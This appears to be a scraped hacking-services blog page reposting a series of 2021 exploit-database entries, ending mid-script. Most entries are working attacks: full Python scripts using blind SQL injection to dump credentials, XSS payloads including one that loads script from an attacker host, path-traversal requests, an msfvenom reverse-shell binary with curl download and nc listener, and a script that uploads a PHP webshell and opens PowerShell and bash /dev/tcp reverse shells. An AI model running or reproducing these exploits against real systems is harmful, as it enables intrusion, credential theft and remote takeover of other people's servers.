Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863135796

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)
# Date: 24/06/2021
# Exploit Author: LinxzSec
# Vulnerability: Local Denial of Service (DoS)
# Vendor Homepage: https://www.ni.com/en-gb.html
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
# Tested Version: 5.3.1f0
# Tested On: Windows 10 Pro x64

'''[ POC ]
1 - Copy printed "AAAAA..." string from "nimax.txt"
2 - Open NIMax.exe
3 - Right click "Remote systems" and press "Create New"
4 - Select "Remote VISA System" and press "Next"
5 - Paste clipboard in "Remote VISA System Address"
6 - Press finish and DoS will occur
'''

buffer = "\x41" * 5000

try:
    f = open("nimax.txt", "w")
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("[+] File could not be created!")
HireHackking 
# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: 18/10/2021
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr
# Tested on: Ubuntu, LAAMP
# Vendor: Dolibarr
# Version: v14.0.2

# Exploit Description:
# Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box. 
# Instructions:
#1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
#
#2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. 
#NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. 
#
#3.Once an administrator user copies the text within the ticket the attack will launch.

function read_body(xhr) {

    var data = xhr.responseXML;
    var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
    console.log(tokenizedUrl);
    return tokenizedUrl;

}

function escalatePrivs() {
    var url = read_body(xhr);
    var http = new XMLHttpRequest();
    http.open('GET', url);
    http.onreadystatechange = function() {
            if (this.readyState  === XMLHttpRequest.DONE && this.status === 200) {
                    return;
            }
    };
    http.send(null);
}

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
            read_body(xhr);
            escalatePrivs(xhr);
    }
}
xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);
HireHackking 
# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034

curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
HireHackking 
# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials


#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ 

import requests
import sys
import urllib3
import pyfiglet 




urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



def find_clients_usernames(url):
    clients = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            clients += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return clients


def find_db_usernames(url):
    users = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            users += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return users

def find_db_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   

    return passwords

def find_client_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   
 
    return passwords


def create_table(users,passwords):
    
    
    for  i in range(0,len(users)):
       print(users[i]," | ",passwords[i])

def print_header():
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*]     Online Motorcycle (Bike) Rental System     [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format("      CAS0", font = "slant"  ))  

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#',",",'.']



if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)


print_header()
print("[*] RETRIEVING CREDENTIALS NOW [*]")
dbUsernames = find_db_usernames(url)
dbUsernames = dbUsernames.split(",")

dbPasswords = find_db_passwords(url)
dbPasswords = dbPasswords.split(",")

print("[*] DATABASE CREDENTIALS [*]")
create_table(dbUsernames,dbPasswords)

clientUsernames = find_clients_usernames(url)
clientsUsernames = clientUsernames.split(",")

clientPasswords = find_client_passwords(url)
clientPasswords = clientPasswords.split(",")

print("[*] CLIENT CREDENTIALS [*]")
create_table(clientsUsernames,clientPasswords)
HireHackking

NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Drop down "My System" then drop down "Software" 5 - Locate "NI-VISA 5.2" and select it 6 - Open the "VISA Options" tab 7 - Drop down "General settings" 8 - Select "Aliases" 9 - Select "Add alias" 10 - Paste string from "nimax.txt" into "Resource name" 11 - Just put a single character in the alias and press "ok", DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")
HireHackking
# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read # Date: 11 October 2021 # Exploit Author: z4nd3r # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 10 Pro Build 19042, English # # Description: # The web server allows for directory traversal and reading of arbitrary files on the # system, given that the account running the server can access the target file. Proof-of-concept using Burp: Request: GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 192.168.50.52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ---------------------------------------- Response: HTTP/1.0 200 OK Date: Thu, 21 Oct 2021 14:55:57 GMT Server: Easy Chat Server/1.0 Accept-Ranges: bytes Content-Length: 92 Connection: close Content-Type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
HireHackking

Jetty 9.4.37.v20210219 - Information Disclosure

HACKER · %s · %s

# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure # Date: 2021-10-21 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.eclipse.org/jetty/ # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ # Version: 9.4.37.v20210219 and 9.4.38.v20210224 # Tested on: Kali Linux # CVE : CVE-2021-28164 POC #1 - web.xml GET /%2e/WEB-INF/web.xml HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
HireHackking
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) # Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) # Date: 2021-10-21 # Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP + Python 3 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers # with access to the username and md5 hash of any administrators. # Vulnerable file: /online-course-registration/Online/pincode-verification.php # Proof of Concept: #!/usr/bin/python3 import requests import sys import string def exploit(hostname, username, password): # Building bruteforce list pass_list = list(string.ascii_lowercase) pass_list += list(range(0,10)) pass_list = map(str, pass_list) pass_list = list(pass_list) user_list = pass_list user_list += list(string.ascii_uppercase) user_list = map(str, user_list) user_list = list(user_list) session = requests.Session() # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/index.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"regno": f"{username}", "password": f"{password}", "submit": ''} r = session.post(url, headers=headers, data=data) print("Admin username:") # This range number is pretty arbitrary, so change it to whatever you feel like for i in range(1,33): counter = 0 find = False for j in user_list: # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(user_list): find = True break if find: break print("\n") print("Admin password hash:") # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed for i in range(1,33): counter = 0 find = False for j in pass_list: url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(pass_list): find = True break if find: break print("\n\nSuccessfully pwnd :)") def logo(): art = R''' __/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ _\///______________\///////////__\///_____\/////__________\///////\//__ ''' info = 'CVE-2021-37357 PoC'.center(76) credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) print(f"{art}\n{info}\n{credits}") def main(): logo() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 4: print("Usage: python3 exploit.py http://127.0.0.1:80 username password") exploit(hostname, username, password) if __name__ == '__main__': main()
HireHackking
# Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 23-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: # Software Link: https://wordpress.org/plugins/simple-tags/ # Tested on Windows # CVE: CVE-2021-24444 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444 # Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate TaxoPress Version 3.0.7.1 3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking
# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) # Date: 24/10/2021 # Exploit Author: Nehru Sethuraman # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart # Version: 21.0817 # Build: 3 # Google Dorks: intitle:buildsmart accounting # Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014 Exploit Details: URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl= *HTTP Method:* POST *POST DATA:* VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail= Vulnerable Parameter: eidValue SQL Injection Type: Stacked queries Payload: ';WAITFOR DELAY '0:0:3'--
HireHackking

Gestionale Open 11.00.00 - Local Privilege Escalation

HACKER · %s · %s

# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://www.gestionaleopen.org/ # Software Homepage: https://www.gestionaleopen.org/ # Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe # Version: 11.00.00 # Tested on: Microsoft Windows 10 Enterprise x64 With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation. Vendor: Gestionale Open srl. Affected version: > 11.00.00 # Details # By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below. # A low privilege account is able to rename the mysqld.exe file located in bin folder and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\Gestionale_Open\MySQL57\bin\mysqld.exe Details: SERVICE_NAME: DB_GO TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Gestionale_Open Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
HireHackking
# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) # Date: 24.10.2021 # Exploit Author: blockomat2100 # Vendor Homepage: https://www.balbooa.com/ # Version: 2.0.6 # Tested on: Docker An example request to trigger the SQL-Injection: POST /index.php?option=com_baforms HTTP/1.1 Host: localhost Content-Length: 862 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035 Connection: close ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="1" {"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}} ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="form-id" 1 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="task" form.message ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="submit-btn" 2 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-title" Home ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-url" http://localhost/ ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-id" 0 ------WebKitFormBoundaryTAak6w3vHUykgInT--
HireHackking
# Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip # Version: 1.0 # Tested on: Linux # Vulnerable page: HOLY # Vulnerable Parameters: "reason" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/event-management/views/?v=HOLY 2) Insert your payload in the "reason" parameter 3) Click "Add holiday" Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS")</script> --- POST /event-management/api/process.php?cmd=holiday HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: http://localhost Connection: close Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted. Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E ---
HireHackking
# Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/media-tags/ # Software Link: www.codehooligans.com/projects/wordpress/media-tags/ # Version: 3.2.0.2 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Media-Tags <= 3.2.0.2 3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking
# Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/ninja-tables/ # Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/ # Version: 4.1.7 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Ninja Tables <= 4.1.7 3. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data' and enter the data into the user input field.Then Navigate to Table Design 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution # Date:21/10/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e # Vulnerability: Through SQL injection to bypass the login form it is # possible to upload a malicious file and after use that malicious file to # execute code in the remote system. # Proof of Concept: import requests import sys import time session = requests.Session() #http_proxy = "http://127.0.0.1:8080" #https_proxy = "https://127.0.0.1:8080" #proxyDict = {"http" : http_proxy, # "https" : https_proxy} def windows(HPW,host,shell_name): payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def linux(HPL,host,shell_name): payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def main(): host = sys.argv[1] shell_name = sys.argv[2] url = host + '/login.php' values = {'user': "admin", 'email': "' OR 1 -- -", 'password': '', 'btn_login': "" } r = session.post(url, data=values) cookie = session.cookies.get_dict()['PHPSESSID'] data = { 'btn_web':''} headers= {'Cookie': 'PHPSESSID='+cookie} request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")}) print("") print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' ) print("") LHOST = input('[+] Enter your LHOST: ') LPORT = 